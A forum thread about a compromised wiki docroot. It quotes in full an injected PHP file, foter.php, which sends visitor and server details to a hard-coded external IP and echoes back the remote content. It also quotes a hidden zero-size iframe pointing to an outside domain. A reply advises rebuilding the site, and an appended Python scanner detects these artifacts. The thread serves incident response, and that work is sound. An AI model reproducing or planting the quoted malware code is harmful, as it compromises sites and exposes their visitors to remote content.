Tim Ware wrote:
I notice several files that seem to have been modified at the docroot level:
foter.php (never noticed this one before) with this content:
<?php
$ip = '209.62.27.83';
$port = '80';
$path = '/linkr/get/';
$fp = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$fp) {
    echo '';
} else {
    $post = "u = ".rawurlencode($_SERVER['HTTP_USER_AGENT'])."&h=".rawurlencode($_SERVER['SERVER_NAME']);
    $out = "POST ".$path." HTTP/1.0\r\n";
    $out .= "Host: ".$ip.":".$port."\r\n";
    $out .= "Content-Type: text/html\r\n";
    $out .= "Content-Length: ".strlen($post)."\r\n";
    $out .= "Connection: Close\r\n";
    $out .= "\r\n";
    $out .= $post;
    fwrite($fp, $out);
    $resp = '';
    while (!feof($fp)) {
        $resp .= fgets($fp, 128);
    }
    fclose($fp);
    $paths = split("\r\n\r\n", $resp);
    echo $paths[1];
}
?>
and this "m-analytics" code was added to an old index page and a google verification page:
<iframe src="http://m-analytics.net/qaqa/?daf02d89f0bb66c3b4a9ff31da01e10a " width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>
Same thing happened to another wiki on this site, where the m-analytics iframe was added. I *did not* add this, so I suspect foul play.
Thoughts?
Tim
Back up everything and start from scratch. The only files from the wiki you should need to keep are the uploads. Remember to verify there aren't scripts there.
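An added example, not part of the original thread: a small Python triage scanner for the three things discussed above, namely zero-sized iframes with an external src, PHP files that open a raw socket the way foter.php does, and scripts hiding in the upload directory. The directory name "uploads", the extension list and the patterns are assumptions to adapt to your own wiki layout.

```python
import os
import re
import sys

# Zero-sized iframe with an absolute src, like the injected m-analytics one.
HIDDEN_IFRAME = re.compile(
    r"<iframe\b(?=[^>]*\bsrc\s*=\s*[\"']?https?://)"
    r"(?=[^>]*\b(?:width|height)\s*=\s*[\"']?0\b)[^>]*>", re.I)
# PHP opening a raw socket, the mechanism foter.php uses to pull remote content.
RAW_SOCKET = re.compile(r"\bp?fsockopen\s*\(", re.I)
PHP_TAG = re.compile(r"<\?php", re.I)
SCRIPT_EXTS = {".php", ".phtml", ".php5", ".phar", ".cgi", ".pl"}


def scan_file(path, in_uploads):
    """Return the reasons this file deserves a manual look (empty if none)."""
    try:
        with open(path, "r", encoding="utf-8", errors="replace") as fh:
            text = fh.read(2_000_000)  # only the first 2 MB is inspected
    except OSError as exc:
        return ["unreadable: %s" % exc]
    reasons = []
    if HIDDEN_IFRAME.search(text):
        reasons.append("hidden-iframe")
    if PHP_TAG.search(text) and RAW_SOCKET.search(text):
        reasons.append("php-raw-socket")
    ext = os.path.splitext(path)[1].lower()
    if in_uploads and (ext in SCRIPT_EXTS or PHP_TAG.search(text)):
        reasons.append("script-in-uploads")
    return reasons


def scan_docroot(root, upload_dirs=("uploads",)):
    """Walk root; return {relative_path: [reasons]} for flagged files.
    upload_dirs is an assumption: set it to your wiki's upload directory."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        rel_dir = os.path.relpath(dirpath, root)
        in_uploads = any(p in upload_dirs for p in rel_dir.split(os.sep))
        for name in files:
            reasons = scan_file(os.path.join(dirpath, name), in_uploads)
            if reasons:
                findings[os.path.normpath(os.path.join(rel_dir, name))] = reasons
    return findings


if __name__ == "__main__":
    root = sys.argv[1] if len(sys.argv) > 1 else "."
    for rel, why in sorted(scan_docroot(root).items()):
        print("%-40s %s" % (rel, ", ".join(why)))
```

Run it against the backup copy rather than the live docroot, and treat a clean result as "nothing matched these patterns", not as proof the files are safe.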